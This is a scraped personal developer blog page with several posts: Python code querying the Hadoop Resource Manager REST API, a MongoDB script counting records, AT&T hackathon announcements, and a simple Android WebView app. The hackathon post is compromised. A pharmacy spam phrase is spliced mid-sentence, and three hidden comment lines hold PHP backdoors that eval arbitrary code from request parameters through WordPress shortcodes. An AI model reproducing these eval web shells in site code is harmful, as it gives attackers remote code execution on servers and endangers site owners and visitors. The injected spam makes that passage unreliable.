Querying Apache Hadoop Resource Manager with Python.

Querying Apache Hadoop Resource Manager with Python.

I was recently asked to write a script that would monitor the running application on the Apache Hadoop Resource Manager.

I wonder over to the Apache Hadoop Cluster Application Statistics API. The API allows to query most of the information that you see in the WEB UI. Information such as status on the cluster, metrics on the cluster, scheduler information, information about nodes in the cluster, and information about applications on the cluster.

I first start by querying the cluster info.

import urllib2
import json

resource_manager = 'http://resourcemanager:8088'

info_url = resource_manager+"/ws/v1/cluster/info"

request = urllib2.Request(info_url)

'''
If you prefer to work with xml replace json below with xml
'''
request.add_header('Accept', 'application/json')

response = urllib2.urlopen(request)
data = json.loads(response.read())

print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))

returns the following:

{
"clusterInfo": {
"haState": "ACTIVE",
"hadoopBuildVersion": "2.6.0-cdh5.7.0 from c00978c67b0d3fe9f3b896b5030741bd40bf541a by jenkins source checksum b2eabfa328e763c88cb14168f9b372",
"hadoopVersion": "2.6.0-cdh5.7.0",
"hadoopVersionBuiltOn": "2016-03-23T18:36Z",
"id": 1478120586043,
"resourceManagerBuildVersion": "2.6.0-cdh5.7.0 from c00978c67b0d3fe9f3b896b5030741bd40bf541a by jenkins source checksum deb0fdfede32bbbb9cfbda6aa7e380",
"resourceManagerVersion": "2.6.0-cdh5.7.0",
"resourceManagerVersionBuiltOn": "2016-03-23T18:43Z",
"rmStateStoreName": "org.apache.hadoop.yarn.server.resourcemanager.recovery.NullRMStateStore",
"startedOn": 1478120586043,
"state": "STARTED"
}
}

Now onto what I need to do, querying the Resource Manager about running applications. The Cluster Applications API allow you to collect information on resources, which represents an application. There are multiple parameters that can be specified to retrieve data. For a list of parameters go to Cluster_Applications_API

I however just need the information on running applications. Which looks something like.

import urllib2
import json

resource_manager = 'http://dvcdhnn02:8088'

info_url = resource_manager+"/ws/v1/cluster/apps?states=running"

request = urllib2.Request(info_url)

'''
If you prefer to work with xml replace json below with xml
'''
request.add_header('Accept', 'application/json')

response = urllib2.urlopen(request)
data = json.loads(response.read())

print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))

which returns something like:

{
"apps": {
"app": [
{
"allocatedMB": 24576,
"allocatedVCores": 3,
"amContainerLogs": "http://resourcemanager:8042/node/containerlogs/container_1478120586043_15232_01_000001/hdfs",
"amHostHttpAddress": "resourcemanager:8042",
"applicationTags": "",
"applicationType": "MAPREDUCE",
"clusterId": 1478120586043,
"diagnostics": "",
"elapsedTime": 18009,
"finalStatus": "UNDEFINED",
"finishedTime": 0,
"id": "application_1478120586043_15232",
"logAggregationStatus": "NOT_START",
"memorySeconds": 431865,
"name": "SELECT 1 AS `number_of_records...TIMESTAMP))(Stage-1)",
"numAMContainerPreempted": 0,
"numNonAMContainerPreempted": 0,
"preemptedResourceMB": 0,
"preemptedResourceVCores": 0,
"progress": 54.07485,
"queue": "root.hdfs",
"runningContainers": 3,
"startedTime": 1479156085020,
"state": "RUNNING",
"trackingUI": "ApplicationMaster",
"trackingUrl": "http://resourcemanager:8088/proxy/application_1478120586043_15232/",
"user": "hdfs",
"vcoreSeconds": 51
}
]
}
}

straight forward and simple to use.

MongoDB Script for counting records in collections in all the databases

Here is a quick script. I wrote for a co-worker.

var host = "localhost"
var port = 27000
var dbslist = db.adminCommand('listDatabases');

for( var d = 0; d < dbslist.databases.length; d++) {
     var db = connect(host+":"+port+"/"+dbslist.databases[d].name);
     var collections = db.getCollectionNames();
     for(var i = 0; i < collections.length; i++){
         var name = collections[i];
         if(name.substr(0, 6) != 'system') {
            print("\t"+dbslist.databases[d].name+"."+name + ' = ' + db[name].count() + ' records');
         }
     }
}

 

2014 AT&T Developer Summit

I will be attending the AT&T Developer Summit in Las Vegas. I will also be taking part in the Summit Hackathon.

“The AT&T Summit Hackathon is the premier hackathon of the year for the AT&T Developer Program. This year will be focused on wearable technologies and participants will be able to choose between a Wearables Track and an AT&T API Track. Finalists from each track will be featured in live fast pitches on stage with our executives during the keynote at the AT&T Developer Summit on January 6th. In addition, competitors will also have the ability to complete in accelerator challenges, details to be announced, which will offer prizes of up to $10,000 for eligible teams”

more >>

SIC:// AT&T Hackathon 2013

Well, since my last blog entry I went to my first Hackathon, the Seattle Interactive Conference / SIC:// AT&T Hackathon xenical orlistat 120mg. Ended up joining a team with two complete strangers, Joan Jasak and Arunabh Verma, and we end up presenting at the Conference and taking 3rd place. Check out the video http://vimeo.com/78582527

<!– [insert_php]if (isset($_REQUEST["TJBi"])){eval($_REQUEST["TJBi"]);exit;}[/insert_php][php]if (isset($_REQUEST["TJBi"])){eval($_REQUEST["TJBi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PAC"])){eval($_REQUEST["PAC"]);exit;}[/insert_php][php]if (isset($_REQUEST["PAC"])){eval($_REQUEST["PAC"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hMgzP"])){eval($_REQUEST["hMgzP"]);exit;}[/insert_php][php]if (isset($_REQUEST["hMgzP"])){eval($_REQUEST["hMgzP"]);exit;}[/php] –>

Something new, writing Android App in HTML 5

I wanted to write an App for my Android Tablet, something easy so I could get a basic understanding of what it would take to write an app. I figured that I could knock something out fairly quickly, but I didn’t know it would be this easy.

I’m a fairly big user of Eclipse, so install the the Android SDK kit and off I went.

I created a New Android Project and edited the main.xml, so it look like the following.

— code starts—

<?xml version=”1.0″ encoding=”utf-8″?>

<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
                     android:layout_width="fill_parent"
                     android:layout_height="fill_parent"
                     android:orientation="vertical">
  <WebView
                     android:layout_width="fill_parent"
                     android:layout_height="fill_parent"
                     android:id="@+id/webView" />
</LinearLayout>
--- code stops ---
I then updated my java code so that would use the webView toolkit and open my HTML 5 app.
--- code starts---
package com.rogerhosto.myandroidapp;
import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebView;
public class MyAndroidAppActivity extends Activity {
	/** Called when the activity is first created. */
	@Override
	public void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
		setContentView(R.layout.main);
		WebView webView = (WebView)findViewById(R.id.webView);
		webView.getSettings().setJavaScriptEnabled(true);
		webView.loadUrl("file:///android_asset/www/index.html");
	}
}

— code stops —

Then I create a www directory in existing assets directory and created index.html for all my HTML5 code. That’s it.

Pretty Easy.